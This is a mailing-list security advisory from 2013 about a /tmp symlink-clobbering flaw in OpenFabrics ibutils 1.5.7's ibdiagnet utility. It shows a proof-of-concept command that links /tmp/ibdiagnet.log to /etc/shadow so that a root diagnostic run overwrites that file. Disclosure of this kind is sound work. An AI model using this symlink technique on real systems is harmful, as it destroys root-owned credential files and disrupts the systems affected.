OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability

3/6/2013
Larry W. Cashdollar
@_larry0

The infiniband diagnostic utiltiy handles files in /tmp insecurely. A malicious user can clobber root owned files with common symlink attacks.

http://www.openfabrics.org/downloads/ibutils/

[nobody@exdb01 tmp]$ ln -s /etc/shadow ibdiagnet.log
[nobody@exdb01 tmp]$ ls -l ibdiagnet.log lrwxrwxrwx 1 nobody users 11 Mar 6 18:19 ibdiagnet.log -> /etc/shadow [nobody@exdb01 tmp]$
The following files are created, I imagine anyone of them can be used.

[root@exdb01 tmp]# ls -l /tmp/ibdiagnet* -rw-r--r-- 1 root root 57611 Mar 6 18:20 /tmp/ibdiagnet.db -rw-r--r-- 1 root root 830 Mar 6 18:20 /tmp/ibdiagnet.fdbs -rw-r--r-- 1 root root 5805 Mar 6 18:20 /tmp/ibdiagnet_ibis.log -rw-r--r-- 1 root root 2359 Mar 6 18:20 /tmp/ibdiagnet.log -rw-r--r-- 1 root root 7072 Mar 6 18:20 /tmp/ibdiagnet.lst -rw-r--r-- 1 root root 456 Mar 6 18:20 /tmp/ibdiagnet.mcfdbs -rw-r--r-- 1 root root 784 Mar 6 18:20 /tmp/ibdiagnet.pkey -rw-r--r-- 1 root root 3348 Mar 6 18:20 /tmp/ibdiagnet.psl -rw-r--r-- 1 root root 179228 Mar 6 18:20 /tmp/ibdiagnet.slvl -rw-r--r-- 1 root root 193 Mar 6 18:20 /tmp/ibdiagnet.sm
After root runs a diagnostic command:

[root@exdb01 tmp]# ibdiagnet -ls 10 -lw 4x -vlr Loading IBDIAGNET from: /usr/lib64/ibdiagnet1.5.7 -W- Topology file is not specified.

Reports regarding cluster links will use direct routes. Loading IBDM from: /usr/lib64/ibdm1.5.7 -W- A few ports of local device are up.

Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered. .


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux